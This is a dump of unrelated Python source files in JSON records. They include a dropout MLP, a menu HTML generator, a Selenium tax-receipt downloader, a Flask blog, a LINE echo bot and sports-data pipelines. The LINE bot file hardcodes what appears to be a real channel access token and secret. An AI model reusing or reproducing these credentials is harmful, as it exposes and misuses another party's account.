weight_inputs.T.dot(error_matrix)\n            for weight_inputs, error_matrix in zip(self._weight_inputs[:-1],\n                                                   partial_jacobians)\n        ]\n\n        # Bias is \\vec{1}^T times partial jacobian (instead of inputs X)\n        return error, numpy.sum(partial_jacobians[0], axis=0), jacobians\n\n\ndef _dot_diag_or_matrix(tensor_a, tensor_b):\n    \"\"\"Dot tensor_a with either tensor_b of diagonals or full jacobian.\n\n    For efficiency, transfer derivatives can return either a vector corresponding\n    to the diagonals of a jacobian, or a full jacobian.\n    Or a matrix or 3-tensor of the above.\n    The diagonal must be multiplied element-wise, which is equivalent to\n    a dot product with a diagonal matrix.\n    \"\"\"\n    if tensor_a.shape == tensor_b.shape:  # tensor_b is only diagonals of transfer jacobian\n        return tensor_a * tensor_b\n    else:\n        # dot each row of tensor_a with each row of tensor_b (which is a matrix jacobian),\n        # using Einstein summation\n        # Because tensor_b is actually a list of jacobians of each row of its given matrix,\n        # instead of a full jacobian.\n        return numpy.einsum('ij,ijk->ik', tensor_a, tensor_b)\n\n\ndef _mean_list_of_list_of_matrices(lol_matrices):\n    \"\"\"Return mean of each matrix in list of lists of matrices.\"\"\"\n    # Sum matrices\n    mean_matrices = lol_matrices[0]\n    for list_of_matrices in lol_matrices[1:]:\n        for i, matrix in enumerate(list_of_matrices):\n            mean_matrices[i] += matrix\n\n    # Divide each by number of lists of matrices\n    for matrix in mean_matrices:\n        matrix /= len(lol_matrices)\n\n    # Return list of mean matrices\n    return mean_matrices\n\ndef _flatten(bias_vec, weight_matrices):\n    \"\"\"Flatten bias vector and weight matrices into flat vector.\"\"\"\n    return numpy.hstack([bias_vec] + [matrix.ravel() for matrix in weight_matrices])\n\n\ndef _unflatten_weights(flat_weights, shape):\n    \"\"\"Unravel flat_weights into bias vector and weight matrices.\"\"\"\n    bias_vec = flat_weights[:shape[1]]\n    matrices = []\n    index = shape[1]\n    for i, j in zip(shape[:-1], shape[1:]):\n        matrices.append(flat_weights[index:index + (i * j)].reshape((i, j)))\n        index += (i * j)\n\n    return bias_vec, matrices\n\n\nclass DropoutMLP(MLP):\n    def __init__(self,\n                 shape,\n                 transfers=None,\n                 optimizer=None,\n                 error_func=None,\n                 input_active_probability=0.8,\n                 hidden_active_probability=0.5):\n        if optimizer is None:\n            # Don't use BFGS for Dropout\n            # BFGS cannot effectively approximate hessian when problem\n            # is constantly changing\n            optimizer = SteepestDescent()\n\n        super(DropoutMLP, self).__init__(shape, transfers, optimizer,\n                                         error_func)\n\n        # Dropout hyperparams\n        self._inp_act_prob = 
input_active_probability\n self._hid_act_prob = hidden_active_probability\n\n # We modify transfers to disable hidden neurons\n # To disable inputs, we need a transfer for the input vector\n # To re-enable hidden neurons, we need to remember the original transfers\n self._input_transfer = LinearTransfer()\n self._real_transfers = self._transfers\n\n # We perform the post-training procedure on the first activation after training\n self._during_training = False\n self._did_post_training = True\n\n def activate(self, input_tensor):\n \"\"\"Return the model outputs for given inputs.\"\"\"\n # Perform post-training procedure on the first activate after training.\n # If done during train method, post-training will not occur when model is used\n # incrementally\n if (not self._during_training) and (not self._did_post_training):\n self._post_training()\n self._did_post_training = True\n\n # Use input transfer to disable inputs (during training)\n return super(DropoutMLP,\n self).activate(self._input_transfer(input_tensor))\n\n def _post_training(self):\n # Activate all inputs\n self._input_transfer = LinearTransfer()\n\n # Activate all hidden\n self._transfers = self._real_transfers\n\n # Adjust weight matrices, based on active probabilities\n # TODO: Do we need to adjust any weights based on self._inp_act_prob?\n for i, _ in enumerate(self._weight_matrices):\n self._weight_matrices[i] *= self._hid_act_prob\n\n def train_step(self, input_matrix, target_matrix):\n \"\"\"Adjust the model towards the targets for given inputs.\n\n Train on a mini-batch.\n \"\"\"\n # Enter training mode\n self._during_training = True\n self._did_post_training = False\n\n # Disable inputs\n self._input_transfer = DropoutTransfer(\n LinearTransfer(), self._inp_act_prob, self._shape[0])\n\n # Disable hidden neurons\n self._disable_hiddens()\n\n error = super(DropoutMLP, self).train_step(input_matrix, target_matrix)\n\n # No longer in training mode\n self._during_training = False\n\n return error\n\n def _disable_hiddens(self):\n \"\"\"Disable random neurons in hidden layers.\"\"\"\n dropout_transfers = []\n\n # Don't disable output neurons\n for transfer_func, num_neurons in zip(self._real_transfers[:-1],\n self._shape[1:-1]):\n dropout_transfers.append(\n DropoutTransfer(transfer_func, self._hid_act_prob,\n num_neurons))\n\n # Use original output transfer\n dropout_transfers.append(self._real_transfers[-1])\n\n self._transfers = dropout_transfers\n\n\n################################################\n# Transfer functions\n################################################\nclass DropoutTransfer(Transfer):\n def __init__(self, transfer_func, active_probability, num_neurons):\n self._transfer = transfer_func\n self._active_neurons = _get_active_neurons(active_probability,\n num_neurons)\n\n def __call__(self, input_tensor):\n return self._transfer(input_tensor) * self._active_neurons\n\n def derivative(self, input_tensor, output_vec):\n \"\"\"Return the derivative of this function.\n\n We take both input and output vector because\n some derivatives can be more efficiently calculated from\n the output of this function.\n \"\"\"\n return self._transfer.derivative(input_tensor, output_vec)\n\n\ndef _get_active_neurons(active_probability, num_neurons):\n \"\"\"Return list of active neurons.\"\"\"\n if active_probability <= 0.0 or active_probability > 1.0:\n raise ValueError('0 < active_probability <= 1')\n\n active_neurons = [\n 1.0 if random.uniform(0, 1) < active_probability else 0.0\n for _ in range(num_neurons)\n ]\n\n # Do 
not allow none active\n if 1.0 not in active_neurons:\n active_neurons[random.randint(0, len(active_neurons) - 1)] = 1.0\n\n return numpy.array(active_neurons)\n","sub_path":"learning/architecture/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":20067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"365952149","text":"import webbrowser\nimport os\nfrom src.models.menu import *\nfrom src.models.menu_item import *\nfrom src.models.analisis_item import *\nfrom src.proyecto_singleton import *\nfrom decimal import Decimal\n\nclass HelperMenu:\n\n def analize_items(self, items, maxim):\n menu = Menu()\n menu.set_name(self.get_menu_name(items))\n menu.set_item(self.get_menu_options(items))\n ProyectoSingleton().menu = menu\n self.build_html(menu, maxim)\n\n def get_menu_name(self, items):\n i = 0\n menu_name = \"\"\n while i < len(items):\n item = items[i]\n \n try:\n if item.get_token() == \"tk_restaurant\":\n if items[i + 1].get_token() == \"tk_asign\":\n if items[i + 2].get_token() == \"tk_string\":\n menu_name = items[i + 2].get_lexema()\n \n except Exception as e:\n if menu_name != \"\":\n break\n i += 1\n\n return menu_name\n\n def get_menu_options(self, items):\n i = 0\n items_dict = {}\n item_name = \"\"\n while i < len(items):\n \n try:\n if items[i].get_token() == \"tk_dp\":\n if items[i - 1].get_token() == \"tk_string\":\n item_name = items[i - 1].get_lexema()\n items_dict[item_name] = []\n \n elif items[i].get_token() == \"tk_corC\":\n if items[i - 1].get_token() == \"tk_string\":\n if items[i - 2].get_token() == \"tk_pc\":\n if items[i - 3].get_token() == \"tk_num\":\n if items[i - 4].get_token() == \"tk_pc\":\n if items[i - 5].get_token() == \"tk_string\":\n if items[i - 6].get_token() == \"tk_pc\":\n if items[i - 7].get_token() == \"tk_id\":\n if items[i - 8].get_token() == \"tk_corA\":\n if item_name != \"\":\n m_item = MenuItem()\n m_item.set_item_id(items[i-7].get_lexema())\n m_item.set_name(items[i-5].get_lexema())\n m_item.set_price(items[i-3].get_lexema())\n m_item.set_description(items[i-1].get_lexema())\n items_dict[item_name].append(m_item)\n except Exception as e:\n i += 1\n continue\n\n i += 1\n return items_dict\n\n def build_html(self, data, maxim):\n generated = False\n\n m_name = data.get_name()\n\n item = ''''''\n for key, values in data.get_items().items():\n item += '''\n
<div>\n                <h2>''' + key.strip(\"'\") + '''</h2>\n            '''\n            for value in values:\n                if maxim == -1:\n                    item += '''<div>\n                                <h3>''' + value.get_name().strip(\"'\") + ''' - Q''' + str(round(Decimal(value.get_price()), 2)) + '''</h3>\n                                <p>''' + value.get_description().strip(\"'\") + '''</p>\n                            </div>\n                            '''\n                elif round(Decimal(value.get_price()), 2) <= Decimal(maxim):\n                    item += '''<div>\n                                <h3>''' + value.get_name().strip(\"'\") + ''' - Q''' + str(round(Decimal(value.get_price()), 2)) + '''</h3>\n                                <p>''' + value.get_description().strip(\"'\") + '''</p>\n                            </div>\n                            '''\n            item += '''</div>'''\n\n        html = '''<html>\n        <head>\n        <title>Menu</title>\n        </head>\n        <body>\n        <h1>''' + m_name.strip(\"'\") + '''</h1>\n        ''' + item + '''\n        </body>\n        </html>
\n \n \n '''\n\n file = open('menu.html', 'w')\n file.write(html)\n file.close()\n filename = 'file://' + os.path.realpath(file.name)\n webbrowser.open_new_tab(filename)\n generated = True\n return generated\n","sub_path":"commons/helper_menu.py","file_name":"helper_menu.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146036200","text":"import time, datetime\nimport sys,os, shutil, csv, getpass\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom PyPDF2 import PdfFileMerger\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\nfrom tkinter import *\nfrom functools import partial\n\n\n\n\nini=''\nfim=''\n\ndef envio(envio):\n global ini\n ini = dIni.get()\n global fim\n fim = dFim.get()\n janela.quit()\n janela.destroy()\n\n\njanela = Tk()\njanela.title('Definir data de busca')\n\n##botaão\nbt = Button(janela, width=10, text=\"OK\")\nbt['command']=partial(envio, bt)\nbt.place(x=120, y=150)\n\n##dateini\ntdIni = Label(janela, text=\"Data Inicio:\")\ntdIni.place(x=20,y=47)\ndIni = Entry(janela)\ndIni.place(x=110,y=50)\n\n##datefim\ntdFim = Label(janela, text=\"Data Fim:\")\ntdFim.place(x=20,y=87)\ndFim = Entry(janela)\ndFim.place(x=110,y=90)\n\njanela.geometry('300x200+200+200')\n\njanela.mainloop()\n##FIM da janela\nuser = getpass.getuser()\nlpath=[]\nn=0\npath = 'C:/Users/'+user+'/Downloads/PagtoWebImpREST.pdf'\npath1 = 'C:/Users/'+user+'/Desktop/pdfs/'\nf=\"\"\ns=\"\"\n\nif not os.path.exists(path1):\n os.makedirs(path1)\n\ndriver = webdriver.Chrome()\ndriver.get(\"https://cav.receita.fazenda.gov.br/ecac/Default.aspx\")\n\nprint(driver.title)\n\nelement = driver.find_element_by_xpath(\"\"\"//*[@id=\"caixa-login-certificado\"]\"\"\")\nelement.click()\ntime.sleep(5)\n\ndriver.get(\"https://cav.receita.fazenda.gov.br/Servicos/ATFLA/PagtoWeb.app/Default.aspx\")\n\ntime.sleep(6)\ndtAi = driver.find_element_by_xpath(\"\"\"//*[@id=\"campoDataArrecadacaoInicial\"]\"\"\")\ndtAi.send_keys(ini)\n\nif not fim==\"\":\n dtAf = driver.find_element_by_xpath('//*[@id=\"campoDataArrecadacaoFinal\"]')\n dtAf.send_keys(fim)\n\nbtConsulta = driver.find_element_by_xpath(\"\"\"//*[@id=\"botaoConsultar\"]\"\"\")\nbtConsulta.click()\n\n\nfor i in driver.find_elements_by_xpath('//*[@class=\"icon print\"]'):\n i.click()\n n=n+1\n while not os.path.exists(path):\n time.sleep(1)\n w = open(path,'r+b')\n f =w.read()\n s=f.find(b'%%EOF')\n o=s+5\n f=f.replace(f[o:],b'')\n w.write(f)\n w.close()\n time.sleep(2)\n t=str(n)+\".pdf\"\n os.rename('C:/Users/'+user+'/Downloads/PagtoWebImpREST.pdf',t)\n shutil.move(t,path1)\n\n\ntime.sleep(1)\nfile=\"\"\nfor files in os.listdir(path1):\n lpath.append(path1+files)\n\nmerger = PdfFileMerger()\n\nfor f in lpath:\n print(f)\n merger.append(f)\n\nmerger.write(path1+\"2017.pdf\")\n\n#//*[@id=\"listagemDARF_ctl0\"\"\"+2+\"\"\"_btnVisualizar\"]\"\"\"\n","sub_path":"buts/buts/DARFS/darfs.py","file_name":"darfs.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636807107","text":"import cv2 \nimport face_recognition\n\ncamera = cv2.VideoCapture(0) \ncounter=0\n\nwhile 1:\n ret, img = camera.read()\n \n face_locations = face_recognition.face_locations(img)\n \n \n 
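# face_locations holds one (top, right, bottom, left) tuple of pixel\n    # coordinates per detected face, matching the unpacking below:\n    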
for face_location in face_locations:\n top, right, bottom, left = face_location\n\n # You can access the actual face itself like this:\n face_image = img[top:bottom, left:right]\n \n cv2.imwrite(\"yuz.jpeg\", face_image) \n counter+=1\n break\n \n\n if counter !=0:\n break\n \n cv2.imshow('img',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break \n \n# Close the window \ncamera.release() \n# De-allocate any associated memory usage \ncv2.destroyAllWindows() \n","sub_path":"Projects/2_2CameraToImage.py","file_name":"2_2CameraToImage.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"607259803","text":"#!/usr/bin/env python\n\nimport rospy\nfrom flexbe_core import EventState, Logger\n\n'''\nCreated on 02/24/2015\n\n@author: Philipp Schillinger\n'''\n\nclass WordCheckingState(EventState):\n\t'''\n\tChecks if the given condition is true and returns the corresponding outcome.\n\tThis state can be used if the further control flow of the behavior depends on a simple condition.\n\t\n\t-- predicate function\tThe condition whose truth value will be evaluated.\n\t\t\t\t\t\t\t\tHas to expect one parameter which will be set to input_value and return a boolean.\n\n\t># input_value\tobject\t\tInput to the predicate function.\n\n\t<= true \t\t\t\t\tReturned if the condition evaluates to True\n\t<= false \t\t\t\t\tReturned if the condition evaluates to False\n\t\n\t'''\n\n\tdef __init__(self,key_word):\n\t\t'''Constructor'''\n\t\tsuper(WordCheckingState, self).__init__(outcomes=['found', 'not_found'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tinput_keys=['input_value'])\n\t\t\n\t\tself._key_word = key_word\n\t\t# self._message_location = message_location\n\t\tself._outcome = 'not_found'\n\t\t\n\tdef execute(self, userdata):\n\t\t'''Execute this state'''\n\n\t\treturn self._outcome\n\t\t\n\tdef on_enter(self, userdata):\n\t\ttry:\t\n\t\t\tself._key_word = self._key_word.lower()\n\t\t\tLogger.logwarn(\"got this:\")\n\t\t\tLogger.logwarn(userdata.input_value)\n\t\t\t\n\n\t\t\t# self._outcome = 'found' if self._predicate(userdata.input_value) else 'not found'\n\t\t\tLogger.logwarn(\"input message from subscriber: \" + userdata.input_value.lower())\n\t\t\tLogger.logwarn(\"im looking through last phrase for the word: \" + self._key_word)\n\t\t\tself._outcome = 'found' if self._key_word in userdata.input_value.lower() else 'not_found'\n\t\t\tif self._key_word in userdata.input_value.lower():\n\n\t\t\t\tprint(\"found the word \" + self._key_word)\n\t\t\t\tLogger.logwarn(\"found the word \" + self._key_word)\n\t\t\telse:\n\t\t\t\tprint(\"did not find the word \" + self._key_word)\n\t\t\t\tLogger.logwarn(\"didn't find the word \" + self._key_word + \" only got this: \" + userdata.input_value.lower())\n\n\t\texcept Exception as e:\n\t\t\tLogger.logwarn('Failed to execute condition function!\\n%s' % str(e))\n","sub_path":"robot_brain_flexbe_states/src/robot_brain_flexbe_states/word_check_state.py","file_name":"word_check_state.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"163249288","text":"from flask import Blueprint, render_template, request, redirect\nfrom utils.Db import Db\n\nanasayfa = Blueprint('anasayfa',__name__,\n url_prefix=\"/anasayfa\")\n\ndef sort(val):\n return val[3]\n\n@anasayfa.route(\"/\")\ndef index():\n databse = Db()\n sql = \"\"\" select * from \"BlogYazisi\" \"\"\"\n data = databse.read_data(sql)\n 
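# The module-level sort() above returns val[3], so rows are ordered by\n    # that column (presumably the post date), newest first:\n    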
data.sort(key = sort, reverse = True)\n return render_template(\"anasayfa/index.html\", data=data)\n\n@anasayfa.route(\"/\")\ndef tekIndexGoster(id):\n database = Db()\n sql = \"\"\" select * from \"BlogYazisi\" where \"Id\" = %s \"\"\"\n data = database.read_data(sql, (id,))\n sql2 = \"\"\" select * from \"Yorum\" where \"BlogId\" = %s \"\"\"\n data2 = database.read_data(sql2,(id,))\n return render_template(\"anasayfa/indexDetay.html\", data=data, iki=data2)\n\n@anasayfa.route(\"/yorum/save\", methods=[\"POST\"])\ndef save():\n blogId = request.form.get(\"BlogId\")\n ekleyen = request.form.get(\"Ekleyen\")\n yorum = request.form.get(\"Yorum\")\n\n database = Db()\n\n sql = \"\"\" insert into \"Yorum\" (\"BlogId\",\"Yorum\",\"Ekleyen\") values (%s,%s,%s) \"\"\"\n database.execute(sql, (blogId, yorum, ekleyen))\n #return render_template(\"anasayfa/indexDetay.html\")\n return redirect(\"/anasayfa\")","sub_path":"gun7/blog/views/AnasayfaController.py","file_name":"AnasayfaController.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"466784848","text":"\n\"\"\"\n Correspondances between the names used by RTE for the columns\n and the user defined names.\n \n\"\"\"\n\nfrom ...... import global_var\n\n\ncolumns = {'Capacité de production Installée (MW)' : global_var.capacity_nominal_mw,\n 'Date de suppression' : global_var.capacity_end_date_local,\n 'Localisation' : global_var.geography_country,\n 'Type' : global_var.production_source,\n 'Date de création' : global_var.publication_creation_dt_local,\n 'Niveau de tension de connexion (KVT)' : global_var.unit_voltage_connection,\n 'Nom de la centrale de production' : global_var.unit_name,\n }","sub_path":"pub_data_visualization/production_capacity/unit/load/rte/transcode/columns.py","file_name":"columns.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479836727","text":"from flask import Flask, request, abort,render_template\nimport os\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nline_bot_api = LineBotApi('tuyTz2UhcdDRg7Yr7Z5p7vxAa3htiT3FeuthTXfUNGtiKjqxit7mnynnVlOWt4Ee4DSsl02ZqhUDVi7IIWizH00gAMSq2XsF1WWe1KKroiz2OWPfa5qo41FwVCjN7gqykdLYSH9z9TTd6U0FOb8IjwdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('1b304804643b6c2c9aed1fac17cdd4ab')\nDATABASE_URL = os.environ.get('DATABASE_URL', 'sqlite:////tmp/flask_app.db')\n\napp.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URL\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100))\n email = db.Column(db.String(100))\n\n def __init__(self, name, email):\n self.name = name\n self.email = email\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n line_bot_api.reply_message(\n event.reply_token,\n 
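# Echo the received text straight back to the sender:\n        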
TextSendMessage(text=event.message.text))\n\n@app.route('/', methods=['GET'])\ndef index():\n    return render_template('index.html', users=User.query.all())\n\nif __name__ == \"__main__\":\n    app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"544707462","text":"from candlestick.patterns.candlestick_finder import CandlestickFinder\n\n\nclass BullishEngulfing(CandlestickFinder):\n    def __init__(self, target=None):\n        super().__init__(self.get_class_name(), 2, target=target)\n\n    def logic(self, idx):\n        candle = self.data.iloc[idx]\n        prev_candle = self.data.iloc[idx + 1 * self.multi_coeff]\n        b_prev_candle = self.data.iloc[idx + 2 * self.multi_coeff]\n\n        close = candle[self.close_column]\n        open = candle[self.open_column]\n\n\n        prev_close = prev_candle[self.close_column]\n        prev_open = prev_candle[self.open_column]\n\n        \n        b_prev_close = b_prev_candle[self.close_column]\n\n        retorno = (close >= prev_open > prev_close and\n                close > open and\n                prev_close >= open and\n                close - open > prev_open - prev_close and \n                prev_close < b_prev_close and \n                b_prev_close < prev_open)\n\n        return retorno\n","sub_path":"candlestick/patterns/bullish_engulfing.py","file_name":"bullish_engulfing.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"454191786","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"http://www.itest.info/courses\"\n#Fetch the HTML of the page being scraped and instantiate BeautifulSoup with html.parser; this is standard boilerplate\nsoup = BeautifulSoup(requests.get(url).text, 'html.parser')\nprint(soup)\n#Iterate over every h4 on the page\nfor course in soup.find_all('h4'):\n    print(course.text)","sub_path":"pachong/get_course.py","file_name":"get_course.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"363367898","text":"# First convert the json into index\\tsentence form\n# Deduplicate (a sentence-level filter)\n# Strip junk content (both specific and generic; a word/phrase-level filter)\n# Strip unrelated text\n# Then process into the dataloader format\n\nimport os\nimport json\nimport sys\nimport random\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nimport pdb\nimport re\n\nimport os\nimport time\nimport argparse\n\n'''\ntopic_name = \"鹿依\"\ndata_dir = os.path.join(\"./data\",topic_name)\nresult_dir = os.path.join(\"./result\",topic_name)\nnew_data_dir = os.path.join(\"./new_data\",topic_name)\n'''\n\ndef create_new(data_dir,result_dir,new_data_dir,check_data_dir):\n    #valid_data = []\n    #check_data = []\n    text_data_list = []\n    text_data_dict = {}\n    result_data_list = []\n    result_data_dict = {}\n    for file_name in os.listdir(data_dir):\n        if '.txt' not in file_name:\n            continue\n        file = os.path.join(data_dir,file_name)\n        with open(file,'r') as f:\n            text_data = f.readlines()\n        text_data_list.append(file_name[:-4])\n        text_data_dict[file_name[:-4]] = text_data\n        f.close()\n\n\n    for file_name in os.listdir(result_dir):\n        if '.txt' not in file_name:\n            continue\n        file = os.path.join(result_dir,file_name)\n        with open(file,'r') as f:\n            result_data = f.readlines()\n        result_data_dict[file_name[:-4]] = result_data\n        f.close()\n\n    assert(len(text_data_dict)==len(result_data_dict))\n\n    for file in text_data_list:\n        print(file)\n        assert(len(text_data_dict[file])==len(result_data_dict[file]))\n        valid_data = []\n        check_data = []\n        for i in range(len(result_data_dict[file])):\n            check_line = {}\n            result_line = result_data_dict[file][i]\n            label = 
result_line.strip('\\n').split('\\t')[1]\n sentence_line = text_data_dict[file][i]\n sentence = sentence_line.strip('\\n')\n check_line = {'label':label,'sentence':sentence}\n if label == '1':\n valid_data.append(sentence)\n check_data.append(check_line)\n\n with open(os.path.join(new_data_dir,file+'.txt'),'w') as f:\n for data in valid_data:\n f.write(data+'\\n')\n f.close()\n\n with open(os.path.join(check_data_dir,file+'.txt'),'w') as f:\n for data in check_data:\n f.write('{}\\t{}\\n'.format(data['label'],data['sentence']))\n f.close()\n\n \n\ndef main():\n create_new(data_dir,result_dir,new_data_dir,check_data_dir)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"preprocess/neu_weibo/preprocess_test/compose_new.py","file_name":"compose_new.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"107745153","text":"\"\"\"Pipeline nodes for transforming match data.\"\"\"\n\nfrom typing import List, Tuple\nfrom functools import partial, reduce, update_wrapper\nimport math\nimport re\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom mypy_extensions import TypedDict\n\nfrom augury.settings import (\n FOOTYWIRE_VENUE_TRANSLATIONS,\n CITIES,\n VENUE_CITIES,\n TEAM_CITIES,\n INDEX_COLS,\n)\nfrom ..nodes.base import (\n _parse_dates,\n _translate_team_column,\n _validate_required_columns,\n _filter_out_dodgy_data,\n _convert_id_to_string,\n _validate_unique_team_index_columns,\n _validate_canoncial_team_names,\n)\n\n\nEloDictionary = TypedDict(\n \"EloDictionary\",\n {\n \"home_away_elo_ratings\": List[Tuple[float, float]],\n \"current_team_elo_ratings\": np.ndarray,\n \"year\": int,\n },\n)\n\n\nMATCH_COL_TRANSLATIONS = {\n \"home_points\": \"home_score\",\n \"away_points\": \"away_score\",\n \"margin\": \"home_margin\",\n \"season\": \"year\",\n \"game\": \"match_id\",\n \"home_goals\": \"home_team_goals\",\n \"away_goals\": \"away_team_goals\",\n \"home_behinds\": \"home_team_behinds\",\n \"away_behinds\": \"away_team_behinds\",\n}\n\nSHARED_MATCH_FIXTURE_COLS = [\n \"date\",\n \"venue\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n]\n\nMATCH_INDEX_COLS = [\"year\", \"round_number\"]\n\nOPPO_REGEX = re.compile(\"^oppo_\")\n\n# Constants for Elo calculations\nBASE_RATING = 1000\nK = 35.6\nX = 0.49\nM = 130\nHOME_GROUND_ADVANTAGE = 9\nS = 250\nSEASON_CARRYOVER = 0.575\n\nEARTH_RADIUS = 6371\nTEAM_LEVEL = 0\nYEAR_LEVEL = 1\nWIN_POINTS = 4\n\n\n# AFLTables has some incorrect home/away team designations for finals 2019\ndef _correct_home_away_teams(match_data: pd.DataFrame) -> pd.DataFrame:\n round_24_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 24)\n incorrect_24_home_team = (match_data[\"home_team\"] == \"Collingwood\") | (\n match_data[\"home_team\"] == \"Richmond\"\n )\n\n round_25_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 25)\n incorrect_25_home_team = match_data[\"home_team\"] == \"GWS\"\n\n round_26_2019 = (match_data[\"year\"] == 2019) & (match_data[\"round_number\"] == 26)\n incorrect_26_home_team = match_data[\"home_team\"] == \"GWS\"\n\n reversed_home_away_teams = (\n (round_24_2019 & incorrect_24_home_team)\n | (round_25_2019 & incorrect_25_home_team)\n | (round_26_2019 & incorrect_26_home_team)\n )\n\n correct_match_data = match_data.loc[~reversed_home_away_teams, :]\n incorrect_match_data = match_data.loc[reversed_home_away_teams, :]\n\n renamed_match_data 
= incorrect_match_data.rename(\n columns=lambda col_name: (\n col_name.replace(\"home_\", \"away_\")\n if \"home_\" in col_name\n else col_name.replace(\"away_\", \"home_\")\n )\n )\n\n return correct_match_data.append(renamed_match_data, sort=False)\n\n\ndef clean_match_data(match_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Clean, translate, and drop data in preparation for ML-specific transformations.\n\n Params\n ------\n match_data (pandas.DataFrame): Raw match data\n\n Returns\n -------\n Cleanish pandas.DataFrame\n \"\"\"\n if any(match_data):\n clean_data = (\n match_data.rename(columns=MATCH_COL_TRANSLATIONS)\n .astype({\"year\": int, \"round_number\": int})\n .pipe(\n _filter_out_dodgy_data(\n subset=[\"year\", \"round_number\", \"home_team\", \"away_team\"]\n )\n )\n .assign(\n match_id=_convert_id_to_string(\"match_id\"),\n home_team=_translate_team_column(\"home_team\"),\n away_team=_translate_team_column(\"away_team\"),\n date=_parse_dates,\n )\n .drop(\"round\", axis=1)\n .sort_values(\"date\")\n .pipe(_correct_home_away_teams)\n )\n\n _validate_unique_team_index_columns(clean_data)\n _validate_canoncial_team_names(clean_data)\n\n return clean_data\n\n return pd.DataFrame()\n\n\ndef _map_footywire_venues(venue: str) -> str:\n return (\n FOOTYWIRE_VENUE_TRANSLATIONS[venue]\n if venue in FOOTYWIRE_VENUE_TRANSLATIONS\n else venue\n )\n\n\ndef _map_round_type(year: int, round_number: int) -> str:\n TWENTY_ELEVEN_AND_LATER_FINALS = year > 2011 and round_number > 23\n TWENTY_TEN_FINALS = year == 2010 and round_number > 24\n TWO_THOUSAND_NINE_AND_EARLIER_FINALS = (\n year > 1994 and year < 2010 and round_number > 22\n )\n\n if year <= 1994:\n raise ValueError(\n f\"Tried to get fixtures for {year}, but fixture data is meant for \"\n \"upcoming matches, not historical match data. Try getting fixture data \"\n \"from 1995 or later, or fetch match results data for older matches.\"\n )\n\n if (\n TWENTY_ELEVEN_AND_LATER_FINALS\n or TWENTY_TEN_FINALS\n or TWO_THOUSAND_NINE_AND_EARLIER_FINALS\n ):\n return \"Finals\"\n\n return \"Regular\"\n\n\ndef _round_type_column(data_frame: pd.DataFrame) -> pd.DataFrame:\n years = data_frame[\"year\"].drop_duplicates()\n\n assert len(years) == 1, (\n \"Fixture data should only include matches from the next round, but \"\n f\"fixture data for seasons {list(years.values)} were given. 
